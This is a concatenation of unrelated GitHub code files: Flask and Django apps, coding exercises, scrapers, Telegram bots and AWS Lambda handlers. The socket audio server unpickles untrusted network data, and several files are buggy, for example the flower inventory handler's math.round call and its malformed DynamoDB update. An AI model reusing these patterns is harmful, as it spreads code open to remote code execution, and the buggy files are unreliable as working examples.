skola')\n return render_template(\"map.html\", data=query)\n\n@app.route('/register', methods=[\"GET\",\"POST\"])\ndef register():\n if request.method == 'GET':\n return render_template('register.html')\n else:\n username = request.form['username']\n password = request.form['password'].encode('utf-8')\n hash_password = bcrypt.hashpw(password, bcrypt.gensalt())\n try:\n user = db.engine.execute(text(\"SELECT * FROM uzivatele WHERE uzivatelske_jmeno=:username\"),username=username,).first()\n if user == None:\n db.engine.execute(\"INSERT INTO uzivatele (uzivatelske_jmeno, heslo) VALUES (%s, %s)\",(username,hash_password))\n session['name'] = username\n flash(\"Registrace proběhla úspěšně\", \"success\")\n return redirect(url_for(\"index\"))\n else:\n flash(\"Uživatel s tímto jménem již existuje\", \"error\")\n return redirect(url_for(\"register\"))\n except Exception as e:\n print(e)\n return \"chyba\"\n \n\n@app.route(\"/login\", methods=[\"GET\",\"POST\"])\ndef login():\n if request.method == \"POST\":\n username = request.form['username']\n password = request.form['password'].encode('utf-8')\n\n user = db.engine.execute(text(\"SELECT * FROM uzivatele WHERE uzivatelske_jmeno=:username\"),username=username,).first()\n\n if user != None:\n if bcrypt.hashpw(password, user[2].encode('utf-8')) == user[2].encode('utf-8'):\n session['name'] = user[1]\n return redirect(url_for(\"index\"))\n flash(\"Jméno a heslo se neshodují\", \"error\")\n return redirect(url_for(\"login\"))\n else:\n return render_template('login.html')\n\n@app.route('/logout')\ndef logout():\n session.clear()\n return redirect(url_for(\"login\"))\n\nif __name__ == \"__main__\":\n app.run(debug=True, threaded=True)","repo_name":"JestrabikR/skoly","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33518692441","text":"import socket #Libreria del socket\r\nimport wave,pyaudio, pickle,struct #Librerias para usar los audios\r\nfrom _thread import * #Libreria de hilos\r\nServerSocket = socket.socket() #Crea el socket\r\nhost = '127.0.0.1'\r\nport = 2524\r\nBuffer = 1024\r\ntry:\r\n ServerSocket.bind((host, port)) #Hacemos el bind\r\nexcept socket.error as e:\r\n print(str(e))\r\nprint('Socket listo')\r\nServerSocket.listen(5)\r\n\r\n#Funcion de trabajo\r\ndef ActividadCliente(connection):\r\n while True:\r\n p = pyaudio.PyAudio() #Manejo de audio\r\n stream = p.open(format=p.get_format_from_width(2), channels=2, rate=44100, output=True, frames_per_buffer=Buffer) #Para definir las constantes que se mandan a los puertos de audio\r\n data = b\"\"\r\n carga = struct.calcsize(\"Q\") #Guarda los bytes que se mandan de carga y los convierte en binario\r\n while True:\r\n try:\r\n while len(data) < carga:\r\n packet = connection.recv(4 * 1024) # Recibir un audio de calidad\r\n if not packet:\r\n break\r\n data += packet\r\n paquete_mensaje = data[:carga] #Los elemento de data hasta que lleguen a carga\r\n data = data[carga:]\r\n mensaje_tam = struct.unpack(\"Q\", paquete_mensaje)[0] #Desempaquetado de los datos\r\n while len(data) < mensaje_tam:\r\n data += connection.recv(4 * 1024)\r\n frame_data = data[:mensaje_tam]\r\n data = data[mensaje_tam:]\r\n frame = pickle.loads(frame_data) #Lo convierte a una secuencia de bytes ya que estan en binario\r\n stream.write(frame) #Crea un objeto de escritura de salida\r\n except:\r\n break\r\n connection.close()\r\nwhile True:\r\n Client, address = ServerSocket.accept() #Acepta la conexion\r\n print('Cliente: ' + address[0] ) #Te dice desde donde se conecta\r\n start_new_thread(ActividadCliente, (Client,)) #Comienza la rutina del hilo\r\nServerSocket.close()","repo_name":"PaoLynch/REDES-2-PRACTICA","sub_path":"Hilos/ServerAud.py","file_name":"ServerAud.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2769428798","text":"def likes(names):\n name = \"\"\n if not len(names):\n name = 'no one likes this'\n elif len(names) == 1:\n name = str(names[0] + ' likes this')\n elif len(names) == 2:\n name = names[0] + ' and ' + names[1] + ' like this'\n elif len(names) == 3:\n name = names[0] + ', ' + names[1] + ' and ' + names[2] + ' like this'\n else:\n name = names[0] + ', ' + names[1] + ' and ' + str(len(names)-2) + ' others like this'\n print(name)\n\n\nlikes(['Max', 'John', 'Mark', 'Tom'])\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BEST ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\ndef likes(names):\n if len(names) == 0:\n return \"no one likes this\"\n elif len(names) == 1:\n return \"%s likes this\" % names[0]\n elif len(names) == 2:\n return \"%s and %s like this\" % (names[0], names[1])\n elif len(names) == 3:\n return \"%s, %s and %s like this\" % (names[0], names[1], names[2])\n else:\n return \"%s, %s and %s others like this\" % (names[0], names[1], len(names)-2)","repo_name":"nikedmands/python","sub_path":"Learning/Codewars/who_likes_it.py","file_name":"who_likes_it.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32307280531","text":"import json\n\nimport moto.server as server\n\n\ndef test_ssoadmin_list():\n backend = server.create_backend_app(\"sso-admin\")\n test_client = backend.test_client()\n\n headers = {\n \"X-Amz-Target\": \"SWBExternalService.ListAccountAssignments\",\n \"User-Agent\": (\n \"aws-cli/2.2.47 Python/3.8.8 Linux/5.11.0-44-generic exe\"\n \"/x86_64.ubuntu.20 prompt/off command/sso-admin.list-account-assignments\",\n ),\n }\n data = {\n \"InstanceArn\": \"arn:aws:sso:::instance/ins-aaaabbbbccccdddd\",\n \"AccountId\": \"222222222222\",\n \"PermissionSetArn\": \"arn:aws:sso:::permissionSet/ins-eeeeffffgggghhhh/ps-hhhhkkkkppppoooo\",\n }\n\n resp = test_client.post(\"/\", headers=headers, data=json.dumps(data))\n\n assert resp.status_code == 200\n assert json.loads(resp.data) == {\"AccountAssignments\": []}\n","repo_name":"getmoto/moto","sub_path":"tests/test_ssoadmin/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"36975802353","text":"'''\r\n 并查集: 本质就是检测图中是否存在圆环,或者一棵树是否存在环\r\n LeetCode - mid - 684 - 冗余连接\r\n LeetCode - mid - 547 - 朋友圈\r\n LeetCode - mid - 1319 - 连通网络的操作次数\r\n LeetCode - mid - 322 - 重新安排行程\r\n'''\r\n\r\n'''\r\n在本问题中, 树指的是一个连通且无环的无向图。\r\n输入: [[1,2], [1,3], [2,3]]\r\n输出: [2,3]\r\n解释: 给定的无向图为:\r\n 1\r\n / \\\r\n2 - 3\r\n\r\n输入: [[1,2], [2,3], [3,4], [1,4], [1,5]]\r\n输出: [1,4]\r\n解释: 给定的无向图为:\r\n5 - 1 - 2\r\n | |\r\n 4 - 3\r\n'''\r\ndef findRedundantConnection(edges):\r\n root = [i for i in range(len(edges)+1)]\r\n def find(i):\r\n if i != root[i]:\r\n root[i] == find(root[i])\r\n return root[i]\r\n for u,v in edges:\r\n u_parent = find(u)\r\n v_parent = find(v)\r\n if u_parent!= v_parent:\r\n root[v_parent] = u_parent\r\n else:\r\n return [u,v]\r\n\r\ne = [[1,2], [2,3], [3,4], [1,4], [1,5]]\r\nprint(findRedundantConnection(e))\r\n\r\n'''\r\n给定一个 N * N 的矩阵 M,表示班级中学生之间的朋友关系。如果M[i][j] = 1,\r\n表示已知第 i 个和 j 个学生互为朋友关系,否则为不知道。你必须输出所有学生中的已知的朋友圈总数。\r\n\r\n输入:\r\n[[1,1,0],\r\n [1,1,0],\r\n [0,0,1]]\r\n输出:2 \r\n解释:已知学生 0 和学生 1 互为朋友,他们在一个朋友圈。\r\n第2个学生自己在一个朋友圈。所以返回 2 。\r\n'''\r\nclass Union(object):\r\n def find_root(self,x,parent):\r\n # 寻找root\r\n root_x = x\r\n while parent[root_x] != -1:\r\n root_x = parent[root_x]\r\n return root_x\r\n\r\n def union(self,x,y,parent):\r\n # 合并x,y节点\r\n root_x = self.find_root(x,parent)\r\n root_y = self.find_root(y,parent)\r\n if root_x!= root_y:\r\n parent[root_y] = root_x\r\n return parent\r\n\r\n def findCircleNum(self,M):\r\n n = len(M)\r\n parent = [-1]*n\r\n for i in range(n):\r\n for j in range(n):\r\n if m[i][j] == 1:\r\n parent = self.union(i,j,parent)\r\n circle = set()\r\n for i in range(n):\r\n root = self.find_root(i,parent)\r\n circle.add(root)\r\n return len(circle)\r\n\r\nm = [[1,1,0],[1,1,0],[0,0,1]]\r\nu = Union()\r\nprint(u.findCircleNum(m))\r\n\r\n'''\r\n请你计算并返回使所有计算机都连通所需的最少操作次数。如果不可能,则返回 -1 。\r\n输入:n = 4, connections = [[0,1],[0,2],[1,2]]\r\n输出:1\r\n解释:拔下计算机 1 和 2 之间的线缆,并将它插到计算机 1 和 3 上。\r\n\r\n输入:n = 6, connections = [[0,1],[0,2],[0,3],[1,2],[1,3]]\r\n输出:2\r\n'''\r\ndef makeConnected(n,connections):\r\n p = [-1]*(n)\r\n for i in range(n):\r\n p[i] = i\r\n\r\n def find(i):\r\n if p[i] != i :\r\n p[i] = find(p[i])\r\n return p[i]\r\n\r\n res = 0\r\n for u,v in connections:\r\n if find(u) == find(v):\r\n res+=1\r\n else:\r\n p[find(v)] = find(u)\r\n n-=1\r\n n-=1\r\n if res 1:\n main_processor = main_processor_parts[1].strip()\n\n elif 'اندازه صفحه نمایش' in text:\n display_size_match = re.search(r'\\d+', text)\n if display_size_match:\n display_size = int(display_size_match.group())\n\n elif text.startswith('حافظه پردازنده گرافیکی') or text.startswith('حافظه گرافیکی:'):\n if 'بدون' not in text:\n graphics_memory_match = re.search(r'\\d+', text)\n if graphics_memory_match:\n graphics_memory = int(graphics_memory_match.group()) \n elif 'بدون' in text:\n graphics_memory = 0 \n\n elif 'پردازنده گرافیکی' in text:\n graphics_processor_parts = text.split(':')\n if len(graphics_processor_parts) > 1:\n graphics_processor = graphics_processor_parts[1].strip()\n\n elif 'وزن' in text:\n weight_match = re.search(r'\\d+\\.\\d+', text)\n if weight_match:\n weight = float(weight_match.group())\n\n elif 'رزولوشن' in text or text.startswith('دقت'):\n resolution_parts = text.split(':')\n if len(resolution_parts) > 1:\n resolution = resolution_parts[1].strip()\n\n elif text.startswith('ظرفیت باتری') or text.startswith('باتری:'):\n battery_capacity_match = re.search(r'\\d+', text)\n if battery_capacity_match:\n battery_capacity = int(battery_capacity_match.group())\n\n try:\n # Insert the laptop details into the database\n cursor.execute('''INSERT INTO asus \n (model, price, storage_capacity, ram_capacity, main_processor, \n display_size, graphics_processor, graphics_memory, weight, resolution, battery_capacity)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)''',\n (model, price, storage_capacity, ram_capacity, main_processor, display_size,\n graphics_processor, graphics_memory, weight, resolution, battery_capacity))\n cnx.commit()\n except mysql.connector.IntegrityError as e:\n # Handle duplicate entry error\n if 'Duplicate entry' in str(e):\n print(\"Duplicate product:\", model)\n else:\n print(\"Error:\", str(e))\n\ncursor.close()\ncnx.close()\n","repo_name":"saranri77/WebScrapping","sub_path":"data_saver.py","file_name":"data_saver.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5653267587","text":"from telethon import TelegramClient, events\nimport telebot\n\n#брать с сайта телеграмма https://my.telegram.org/auth\napi_id = ''\napi_hash = ''\n\nclient = TelegramClient('mirror', api_id, api_hash)\n\n#брать из botFather\nbot = telebot.TeleBot('')\nclient.start()\n\n#id чата, из которого нужно миррорить\n@client.on(events.NewMessage(-1111111111111))\nasync def main1(event):\n sender = await event.get_sender()\n who = \"Пишет \" + sender.first_name + \": \"\n\n #id чата куда мирорить\n bot.send_message(-111111111111, who)\n bot.send_message(-111111111111, event.message)\n\nclient.run_until_disconnected()\n\n","repo_name":"GilgameshH0/telegram-mirror","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12449816062","text":"from http import HTTPStatus\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom notes.models import Note\n\nUser = get_user_model()\n\n\nclass TestRoutes(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.author = User.objects.create(username='Автор')\n cls.reader = User.objects.create(username='Другой автор')\n cls.note = Note.objects.create(title='Заголовок',\n text='Текст',\n author=cls.author)\n\n def test_pages_availability(self):\n urls = (\n 'notes:home',\n 'users:login',\n 'users:logout',\n 'users:signup',\n )\n for name in urls:\n with self.subTest(name=name):\n url = reverse(name)\n response = self.client.get(url)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_pages_availability_for_auth_client(self):\n urls = (\n 'notes:add',\n 'notes:success',\n 'notes:list',\n )\n for name in urls:\n self.client.force_login(self.author)\n with self.subTest(name=name):\n url = reverse(name)\n response = self.client.get(url)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_availability_for_note__edit_delete_detail(self):\n users_statuses = (\n (self.author, HTTPStatus.OK),\n (self.reader, HTTPStatus.NOT_FOUND),\n )\n for user, status in users_statuses:\n self.client.force_login(user)\n for name in ('notes:edit', 'notes:delete', 'notes:detail'):\n with self.subTest(user=user, name=name):\n url = reverse(name, kwargs={'slug': self.note.slug})\n response = self.client.get(url)\n self.assertEqual(response.status_code, status)\n\n def test_pages_redirect(self):\n login_url = reverse('users:login')\n urls = (\n ('notes:add', None),\n ('notes:success', None),\n ('notes:list', None),\n ('notes:delete', {'slug': self.note.slug}),\n ('notes:edit', {'slug': self.note.slug}),\n ('notes:detail', {'slug': self.note.slug}),\n )\n for name, kwargs in urls:\n with self.subTest(name=name):\n url = reverse(name, kwargs=kwargs)\n redirect_url = f'{login_url}?next={url}'\n response = self.client.get(url)\n self.assertRedirects(response, redirect_url)\n","repo_name":"V1sl3t/django_testing","sub_path":"ya_note/notes/tests/test_routes.py","file_name":"test_routes.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18679592580","text":"\"\"\"\nStructure utilities.\n\"\"\"\n\nimport src.constants as constants\n\ndef replace_service_name(structure: dict, service_name: str) -> None:\n \"\"\"\n Replace the service name in the structure.\n \"\"\"\n for key, value in structure.copy().items():\n if isinstance(value, dict):\n replace_service_name(value, service_name)\n else:\n formatted_key = key.replace(constants.SERVICE_NAME_REPLACEMENT, service_name)\n structure[formatted_key] = structure.pop(key, value)\n\n\ndef add_init_files_to_structure(structure: dict) -> None:\n \"\"\"\n Add the __init__.py files to the structure.\n \"\"\"\n for value in structure.values():\n if isinstance(value, dict):\n add_init_files_to_structure(value)\n structure[constants.INIT_FILE] = \"\"\n","repo_name":"DoMo-98/microservice_setup","sub_path":"src/utils/structure_utils.py","file_name":"structure_utils.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75148540624","text":"import json\nimport os\nimport boto3\nimport logging\nimport random\nimport math\nfrom custom_encoder import Customer_Encoder\nfrom flowers import build_flower_id\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndb = boto3.resource('dynamodb')\nclient = boto3.client('dynamodb')\nFLOWER_INVENTORY_TABLE_NAME = os.environ[\"INVENTORY_TABLE\"]\nTRANSACTION_TABLE_NAME = os.environ[\"TRANSACTION_TABLE\"]\n\n# methods and paths\nPUT_METHOD = \"PUT\"\nPATCH_METHOD = \"PATCH\"\nSALE_PATH = \"/sale\"\nPURCHASE_PATH = \"/purchase\"\n\n# function to update inventory and record sale\ndef flower_transaction_func(event, context):\n\n response = {}\n\n # information from API request\n logger.info(event)\n http_method = event['httpMethod']\n path = event['path']\n request_body = json.loads(event['body'])\n\n # common information for both paths\n transactionId = math.round(random.random()*10000)\n\n # initial information for \"total\" flower information\n total_flowers = 0\n total_flower_types = 0\n total_price = 0\n valid_sale = True # will change to false if there is not enough inventory\n\n # flower loop will run for both paths\n for flower in request_body:\n total_flower_types += 1\n total_flowers += flower['quantity']\n total_price += flower['quantity'] * flower['price']\n\n flower_id = build_flower_id(flower)\n\n current_quantity = get_flower_quantity(flower_id)\n\n # will only effect the result of the 'sale' path\n if flower['quantity'] > current_quantity:\n valid_sale = False\n \n if path == PURCHASE_PATH:\n update_quantity(flower_id, flower['quantity'])\n elif path == SALE_PATH:\n update_quantity(flower_id, -1 * flower['quantity'])\n \n\n # makes sure the combination of method and path is supported\n if http_method == PUT_METHOD and path == PURCHASE_PATH:\n\n # writes the summary information to the transaction table\n transaction_response = write_to_transaction_table(transactionId, total_flower_types, total_flowers, total_price, \"purchase\")\n\n for flower in request_body:\n flower_id = build_flower_id(flower)\n\n # gets current quantity of the flower\n current_quantity = get_flower_quantity(flower_id)\n\n # calculates new total\n\n\n # records updated inventory to table\n \n # update inventory table\n \n\n # loop over json elements of flowers\n\n\n elif http_method == PATCH_METHOD and path == SALE_PATH:\n \n transaction_response = write_to_transaction_table(transactionId, total_flower_types, total_flowers, total_price, \"sale\")\n \n\n\n # if event[\"httpMethod\"] != \"GET\":\n # raise Exception(f\"getAllItems only accept GET method, you tried: {event.httpMethod}\")\n\n # data = client.scan(TableName=os.environ[\"INVENTORY_TABLE\"])\n # items = data[\"Items\"]\n # response = {\n # \"statusCode\": 200,\n # \"body\": json.dumps(items)\n # }\n\n return response\n\ndef write_to_transaction_table(transaction_id, total_flower_types, total_flowers, total_price, sale_puchase = \"sale\"):\n\n # writes new item to transaction table\n response = client.update_item(\n TableName = TRANSACTION_TABLE_NAME,\n Key = {\n 'trasnaction_id': {\n 'S': transaction_id\n }\n },\n ExpressionsAttributeNames = {\n '#F': 'total_flower_types',\n '#T': 'total_flowers',\n '#P': 'total_price',\n '#S': 'sale_purchase'\n },\n ExpressionAttributeValues = {\n ':f': {\n 'N': total_flower_types\n },\n ':t': {\n 'N': total_flowers\n },\n ':p': {\n 'N': total_price\n },\n ':s': {\n 'S': sale_puchase\n }\n },\n ReturnValues = 'ALL_NEW',\n UpdateExpression = 'SET #F = :f, #T = :t, #P = :p, #S = :s'\n )\n\n return response\n\ndef update_inventory_table(flower_id, quantity, sale_purchase):\n\n response = {}\n # search for the item in the table\n\n # calculate new total\n\n # write new information to the table\n\n # return the response\n\n return response\n\ndef get_flower_quantity(flower_id):\n try:\n response = client.get_item(\n TableName = FLOWER_INVENTORY_TABLE_NAME,\n Key = {\n 'flower_id' : {\n 'S': flower_id\n }\n }\n )\n\n except:\n return None\n\n return response['quantity']\n\n# separeate function to simplify code\n# to subtract from current total, make the quantity negative\ndef update_quantity(flower_id, quantity):\n response = client.update_item(\n TableName = FLOWER_INVENTORY_TABLE_NAME,\n Key = {\n 'flower_id': {\n 'S': flower_id\n }\n },\n ExpressionAttributeNames = {\n '#QTY': 'quantity'\n },\n ExpressionAttributeValues = {\n ':q': quantity\n },\n UpdateExpression = 'ADD #QTY = :q'\n )","repo_name":"murraycoding/AWS_Code","sub_path":"serverless-inventory-system/src/handlers/update_inventory.py","file_name":"update_inventory.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31033433642","text":"from returing.nn_old.operation import Operation\nfrom returing.nn_old.tensor import Tensor\nfrom returing.nn_old.utils import safe_read_dict\n\nimport numpy as np\nnp.random.seed(20170430)\n\n\nclass Sliding2D(Operation):\n # Composite Unary Operation\n\n def __init__(self, **kwargs):\n super(Sliding2D, self).__init__()\n\n self.width_idx = safe_read_dict(kwargs, 'width_idx', 0)\n self.height_idx = safe_read_dict(kwargs, 'height_idx', 0)\n self.kernel_size = safe_read_dict(kwargs, 'kernel_size', 1)\n self.stride = safe_read_dict(kwargs, 'stride', 1)\n\n def forward(self, *args):\n \"\"\"\n # Input\n X: [n_samples, width, height] (Padded Size)\n width_idx,\n height_idx,\n kernel_size,\n stride\n\n # Output\n Y_pred: [n_samples, K, K], kernel_size * kernel_size\n Y_pred = X[:, W_i*S:W_i*S+K, H_i*S:H_i*S+K]\n\n Y_pred = X [:, width_idx * stride : width_idx * stride + kernel_size,\n height_idx * stride : height_idx * stride + kernel_size]\n\n \"\"\"\n\n assert len(args) == 1\n assert isinstance(args[0], Tensor)\n assert isinstance(args[0].data, np.ndarray)\n assert len(args[0].data.shape) == 3\n\n X = args[0]\n self.X = X # 1.Save input tensors for current function\n\n Y_pred_data = self.X.data[:, self.width_idx * self.stride :\n self.width_idx * self.stride + self.kernel_size,\n self.height_idx * self.stride :\n self.height_idx * self.stride + self.kernel_size]\n\n Y_pred = Tensor(Y_pred_data)\n Y_pred.grad_fn = self # 3. Set grad_fn & requires_grad for current function\n if self.X.requires_grad:\n Y_pred.requires_grad = True\n\n Y_pred.left_child = X # 4. Set parent-child relationships.\n X.parent = Y_pred\n\n return Y_pred # 2. Return new Tensor\n\n def backward(self, grad_out=None):\n \"\"\"\n grad_out: [n_samples, K, K], np.ndarray\n\n X: [n_samples, width, height], np.ndarray\n Modify the gradient of X[n_samples, W_i*S:W_i*S+K, H_i*S:H_i*S+K],\n not the entire X\n \"\"\"\n assert isinstance(self.X, Tensor)\n\n if not self.X.requires_grad:\n return\n\n assert isinstance(self.X.data, np.ndarray)\n assert len(self.X.data.shape) == 3\n\n W_i = self.width_idx\n H_i = self.height_idx\n S = self.stride\n K = self.kernel_size\n n_samples = self.X.data.shape[0]\n\n # For sliding function, the gradient is 1.\n cur_grad = np.ones((n_samples, self.kernel_size, self.kernel_size))\n\n if not isinstance(grad_out, np.ndarray):\n grad_out = np.ones((n_samples, K, K))\n\n assert cur_grad.shape == grad_out.shape\n\n cur_grad *= grad_out\n\n if isinstance(self.X.grad, np.ndarray):\n # In numpy `*` is element-wise multiply\n self.X.grad[:, W_i*S:W_i*S+K, H_i*S:H_i*S+K]\\\n += cur_grad\n else:\n self.X.grad = np.zeros(self.X.data.shape)\n self.X.grad[:, W_i * S:W_i * S + K, H_i * S:H_i * S + K] = cur_grad","repo_name":"feynmanma7/machine_learning","sub_path":"returing/returing/nn_old/operation/base/slide.py","file_name":"slide.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18939777306","text":"class funString():\n\n def __init__(self, str1, str2):\n self.string1 = str1\n self.mode = str2\n\n def __str__(self):\n pass\n\n def size(self) :\n return len(self.string1)\n\n def changeSize(self):\n i = 0\n ch2 = \"\"\n while str1[i:]:\n ch = ord(str1[i])\n if ch > 64 and ch < 91:\n ch2 += chr(ch+32)\n elif ch > 96 and ch < 123:\n ch2 += chr(ch-32)\n else:\n ch2 += chr(ch)\n i += 1\n return ch2\n\n def reverse(self):\n return str1[::-1]\n\n def deleteSame(self):\n ans = []\n emt = [i for i in str1]\n emt.sort()\n for i in emt:\n if i not in ans:\n ans.append(i)\n return \"\".join(ans)\n\n\nstr1,str2 = input(\"Enter String and Number of Function : \").split()\n\nres = funString(str1, str2)\n\nif str2 == \"1\" : print(res.size())\n\nelif str2 == \"2\": print(res.changeSize())\n\nelif str2 == \"3\" : print(res.reverse())\n\nelif str2 == \"4\" : print(res.deleteSame())","repo_name":"chanathipjjj444/OOD","sub_path":"ch2/funString.py","file_name":"funString.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36001855572","text":"# media_bundler/conf/bundler_settings.py\n\n\"\"\"\nmedia_bundler specific settings with the defaults filled in.\n\nIf the user has overridden a setting in their settings module, we'll use that\nvalue, but otherwise we'll fall back on the value from\nmedia_bundler.default_settings. All bundler- specific settings checks should\ngo through this module, but to check global Django settings, use the normal\ndjango.conf.settings module.\n\"\"\"\n\nfrom django.conf import settings\n\nfrom media_bundler.conf import default_settings\n\n\nUSE_BUNDLES = getattr(settings, \"USE_BUNDLES\",\n default_settings.USE_BUNDLES)\nDEFER_JAVASCRIPT = getattr(settings, \"DEFER_JAVASCRIPT\",\n default_settings.DEFER_JAVASCRIPT)\nMEDIA_BUNDLES = getattr(settings, \"MEDIA_BUNDLES\",\n default_settings.MEDIA_BUNDLES)\nBUNDLE_VERSION_FILE = getattr(settings, \"BUNDLE_VERSION_FILE\",\n default_settings.BUNDLE_VERSION_FILE)\nBUNDLE_VERSIONER = getattr(settings, \"BUNDLE_VERSIONER\",\n default_settings.BUNDLE_VERSIONER)\n","repo_name":"rnk/django-media-bundler","sub_path":"media_bundler/conf/bundler_settings.py","file_name":"bundler_settings.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"48"} +{"seq_id":"73219952466","text":"from photoboo.PhotoBooManager import PhotoBooManager\nimport time\n\n# image_filepath = \"beatles.jpg\"\nimage_filepath = \"original_1571629730.jpg\"\n# image_filepath = \"adonis-moustache.jpg\"\n\nphoto_boo = PhotoBooManager()\n\ntimestamp = round(time.time())\nprint(\"ghosting...\")\nimage = photo_boo.ghostify(cv2.imread(image_filepath, cv2.IMREAD_GRAYSCALE), timestamp)\nprint(\"took {} seconds to ghost\".format(round(time.time()) - timestamp))\n\nprint(image)","repo_name":"glitch003/photoboo","sub_path":"camera/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32042353112","text":"import json\nimport os\nimport requests\nimport boto3\n\nimport boto3\n\ndef obter_arquivo_mais_recente(nome_s3, nome_bucket):\n s3 = boto3.client('s3')\n response = s3.list_objects_v2(Bucket=nome_bucket)\n objetos = response['Contents']\n objetos_ordenados = sorted(objetos, key=lambda x: x['LastModified'], reverse=True)\n nome_arquivo_mais_recente = objetos_ordenados[0]['Key']\n obj = s3.get_object(Bucket=nome_bucket, Key=nome_arquivo_mais_recente)\n body = obj['Body'].read().decode()\n return nome_arquivo_mais_recente, body\n\n\n\ndef porcentagem(conteudo_arquivo):\n linhas = conteudo_arquivo.strip().split('\\n')\n soma_confidence = 0.0\n soma_confidence_gun = 0.0\n\n for linha in linhas[1:]: # Começando do índice 1 para ignorar o cabeçalho\n valores = linha.split(';') # Usar ';' como separador\n if len(valores) >= 5: # Verificar se a linha tem pelo menos 5 colunas (a coluna do confidence)\n confidence_str = valores[4]\n name = valores[6].lower() # Convertendo para minúsculas\n \n try:\n confidence = round(float(confidence_str) * 100) / 100\n print(f\"Valor lido e convertido: {confidence:.2f}\")\n \n if name == 'gun':\n print(f\"Nome da classe: {name}\")\n print(f\"Valor de confidence 'gun' antes da adição de 10: {confidence_str}\")\n confidence_gun = float(confidence_str) *2\n print(f\"Valor de confidence 'gun' após a adição de 10: {confidence_gun}\")\n soma_confidence_gun += confidence_gun\n else:\n soma_confidence += confidence\n \n except ValueError:\n print(f\"Não foi possível converter o valor de confidence: {confidence_str}\")\n\n print(f\"Resultado da soma (confiança normal): {soma_confidence:.2f}\")\n print(f\"Resultado da soma (confiança gun): {soma_confidence_gun:.2f}\")\n \n somafinal = (soma_confidence + soma_confidence_gun) * 100 / 4\n return round(somafinal , 2 ) # Arredondar a soma com duas casas decimais \n\n\n\ndef last_chat_id(token):\n try:\n url = \"https://api.telegram.org/bot{}/getUpdates\".format(token)\n response = requests.get(url)\n if response.status_code == 200:\n json_msg = response.json()\n for json_result in reversed(json_msg['result']):\n message_keys = json_result['message'].keys()\n if ('chat' in message_keys) or ('group_chat_created' in message_keys):\n return json_result['message']['chat']['id']\n print('Nenhum grupo encontrado')\n else:\n print('A resposta falhou, código de status: {}'.format(response.status_code))\n except Exception as e:\n print(\"Erro no getUpdates:\", e)\n\n\ndef send_message(token, chat_id, message):\n try:\n data = {\"chat_id\": chat_id, \"text\": message}\n url = \"https://api.telegram.org/bot{}/sendMessage\".format(token)\n requests.post(url, data)\n except Exception as e:\n print(\"Erro no sendMessage:\", e)\n\n\ndef mover_arquivo(nome_s3, nome_bucket_origem, nome_bucket_destino):\n s3 = boto3.client('s3')\n \n nome_arquivo, conteudo_arquivo = obter_arquivo_mais_recente(nome_s3, nome_bucket_origem)\n\n s3.copy_object(\n Bucket=nome_bucket_destino,\n CopySource={'Bucket': nome_bucket_origem, 'Key': nome_arquivo},\n Key=nome_arquivo\n )\n\n s3.delete_object(\n Bucket=nome_bucket_origem,\n Key=nome_arquivo\n )\n\n return nome_arquivo, conteudo_arquivo\n\n\ndef lambda_handler(event, context):\n \n # Configurações\n nome_s3 = \"\"\n nome_bucket_origem = \"\"\n nome_bucket_destino = \"\"\n token = os.environ.get('TOKEN') #variavel de ambiente Lambda\n\n try:\n nome_arquivo, conteudo_arquivo = mover_arquivo(nome_s3, nome_bucket_origem, nome_bucket_destino)\n print(conteudo_arquivo)\n\n chat_id = last_chat_id(token)\n print(\"Id do chat:\", chat_id)\n\n alerta_assalto = porcentagem(conteudo_arquivo)\n mensagem = \"⚠!!!CUIDADO!!!⚠\\nALERTA DE ASSALTO COM {}% DE CHANCE\".format(alerta_assalto)\n\n send_message(token, chat_id, mensagem)\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Mensagem enviada e arquivo movido com sucesso.')\n }\n except Exception as e:\n return {\n 'statusCode': 500,\n 'body': json.dumps(f'Erro na execução da função lambda: {str(e)}')\n 